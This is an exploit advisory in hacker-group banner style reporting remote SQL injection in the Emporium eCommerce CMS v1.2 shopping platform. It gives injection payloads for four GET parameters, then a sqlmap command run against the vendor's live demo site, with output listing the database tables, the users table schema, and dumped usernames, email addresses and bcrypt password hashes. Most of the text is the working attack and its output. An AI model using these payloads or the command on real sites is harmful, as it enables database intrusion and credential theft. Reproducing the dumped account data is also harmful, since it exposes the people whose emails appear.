┌┌────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Exploits ] ┌┘ └────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr │ │ : │ Website : mybizcms.com │ │ │ │ Vendor : mybizcms │ │ │ │ Software : Emporium eCommerce - │ │ │ │ Online Shopping CMS v 1.2 │ │ Emporium eCommerce │ │ Vuln Type: Remote SQL Injection │ │ │ │ Method : GET │ │ is a complete online │ │ Critical : High [░░▒▒▓▓██] │ │ shopping platform for all your needs │ │ Impact : Database Access │ │ │ │ │ │ │ │ ────────────────────────────────────────┘ └─────────────────────────────────────────│ │ B4nks-NET irc.b4nks.tk #unix ┌┘ └────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ Typically used for remotely exploitable vulnerabilities that can lead to │ │ system compromise. │ │ │ ┌┌────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk loool, DevS, Dark-Gost CryptoJob (Twitter) twitter.com/CryptozJob ┌┌────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2022 ┌┘ └────────────────────────────────────────────────────────────────────────────────────┘┘ There's 4 parameters Vulnerable to SQL Injection in /categories/other-categories? GET parameter 'min_price' is vulnerable --- Parameter: min_price (GET) Type: error-based Title: MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) Payload: min_price=(UPDATEXML(5880,CONCAT(0x2e,0x7176787a71,(SELECT (ELT(5880=5880,1))),0x716b707071),2936))&max_price=145000&storage[]=41 Type: time-based blind Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction) Payload: min_price=(SELECT 3031 FROM (SELECT(SLEEP(5)))qWqF)&max_price=145000&storage[]=41 --- GET parameter 'percentage' is vulnerable. --- Parameter: percentage (GET) Type: boolean-based blind Title: MySQL boolean-based blind - Parameter replace (MAKE_SET) Payload: percentage=MAKE_SET(4728=4728,5649) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: percentage=40 AND (SELECT 8890 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(8890=8890,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: percentage=40 AND (SELECT 9724 FROM (SELECT(SLEEP(5)))chdS) --- GET parameter 'review_ratings' is vulnerable --- Parameter: review_ratings (GET) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: review_ratings=4 AND (SELECT 5450 FROM(SELECT COUNT(*),CONCAT(0x7170706b71,(SELECT (ELT(5450=5450,1))),0x717a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: review_ratings=4 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))lpXn) --- GET parameter 'brand[]' is vulnerable --- Parameter: brand[] (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: brand[]=15') AND 3512=3512 AND ('Othl'='Othl Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: brand[]=15');SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: brand[]=15') AND (SELECT 9038 FROM (SELECT(SLEEP(5)))hyaE) AND ('KJgc'='KJgc --- Live Demo Site: https://mybizcms.com/demos/multivendor/ [+] Starting the Attack sqlmap.py -u "https://mybizcms.com/demos/multivendor/categories/other-categories?brand%5B%5D=15" --current-db --batch --random-agent [INFO] the back-end DBMS is MySQL web application technology: Apache, PHP 7.3.33, PHP back-end DBMS: MySQL >= 5.0 (MariaDB fork) [INFO] fetching current database current database: 'mybizcms_multivendor' fetching tables for database: 'mybizcms_multivendor' [101 tables] +--------------------------+ | returns | | ad_placements | | addresses | | ads | | attribute_items | | attributes | | authorize_net_settings | | brands | | categories | | collections | | company | | counties | | countries | | credit_card_types | | cronjobs | | customers | | deliveries | | delivery_items | | delivery_options | | delivery_status | | discounts | | email_templates | | facebook_settings | | faqs | | flash_sale_items | | flash_sales | | flutterwave_settings | | github_settings | | google_settings | | item_status | | labels | | linkedin_settings | | logs | | media | | mpesa_settings | | newsletters | | notifications | | options | | order_details | | order_items | | order_status | | orders | | pages | | payment_options | | payment_status | | payments | | payout_modes | | payout_status | | payouts | | paypal_pro_settings | | paypal_standard_settings | | paytm_settings | | payu_money_settings | | permissions | | pesapal_settings | | pickup_stations | | post_categories | | post_comments | | posts | | product_attributes | | product_images | | product_reviews | | product_stock | | product_types | | product_variants | | product_wholesales | | products | | quicks | | return_reasons | | return_status | | rewards | | role_sub_permissions | | roles | | saved_items | | sessions | | shipping_fees | | shipping_regions | | shipping_weights | | shops | | sliders | | stripe_settings | | sub_permissions | | subscribers | | supported_currencies | | tags | | taxes | | temp_data | | ticket_priority | | ticket_replies | | ticket_status | | tickets | | timezones | | twitter_settings | | twocheckout_settings | | user_status | | user_sub_permissions | | users | | variant_choices | | variant_options | | wallets | | weights | +--------------------------+ fetching columns for table 'users' in database 'mybizcms_multivendor' Table: users [34 columns] +------------------------+--------------+ | Column | Type | +------------------------+--------------+ | calling_code | varchar(11) | | city | varchar(100) | | company | varchar(100) | | country_id | int(11) | | date_added | datetime | | default_billing | int(11) | | default_currency | int(11) | | default_language | varchar(40) | | default_shipping | int(11) | | department_id | int(11) | | email | varchar(100) | | firstname | varchar(50) | | last_ip | varchar(40) | | last_login | datetime | | last_password_change | datetime | | lastname | varchar(50) | | latitude | varchar(300) | | longitude | varchar(300) | | new_pass_key_requested | datetime | | passkey | varchar(32) | | password | varchar(256) | | payout_address | longtext | | payout_mode_id | int(11) | | phone | varchar(30) | | postal_code | varchar(100) | | profile_image | varchar(150) | | role_id | int(11) | | state | varchar(50) | | street | varchar(100) | | user_id | int(11) | | user_status_id | int(11) | | user_uid | varchar(50) | | username | varchar(100) | | zip_code | varchar(15) | +------------------------+--------------+ fetching entries of column(s) 'email,password,username' for table 'users' in database 'mybizcms_multivendor' Database: mybizcms_multivendor Table: users [7 entries] +----------+--------------------------------------------------------------+------------------------+ | username | password | email | +----------+--------------------------------------------------------------+------------------------+ | admin | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | admin@mybizcms.com | | one | $2y$10$G1DsE2VvjMDBFvozlWr.X.H1dq.UgNhTYSrMHGftuollcDDr9OA2m | evanskynot25@gmail.com | | two | $2y$10$K27UTI0KPeP.N.6EzxED6eVgU6jcAJDq8vf.EuCxzGSEFdSyI/oeC | jdoe@gmail.con | | umuruviq | $2y$10$SID3yybe763.xosi8qwqkOTG8baLQQpIVdfrYzqG9dTPhcTtVL5Bu | sync@mybizcms.com | | three | $2y$10$iBnMAPE.3FDeivo2kYPhSerMS05TmbIZQ/bLD6FcmvCowStICaaw. | tew@gmail.com | | user | $2y$10$eZ0/eOZ5R.Mwju4nCqIgHuaVnBosugt8ADjwMCDzQP6oUUH2l5NVK | user@mybizcms.com | | tbjjrhls | $2y$10$XKA6hBkZlCAU3T7KcQm.7ubs06COQH4mCcGHmBMwzyYp016oBYoPe | vendor@mybizcms.com | +----------+--------------------------------------------------------------+------------------------+ [-] Done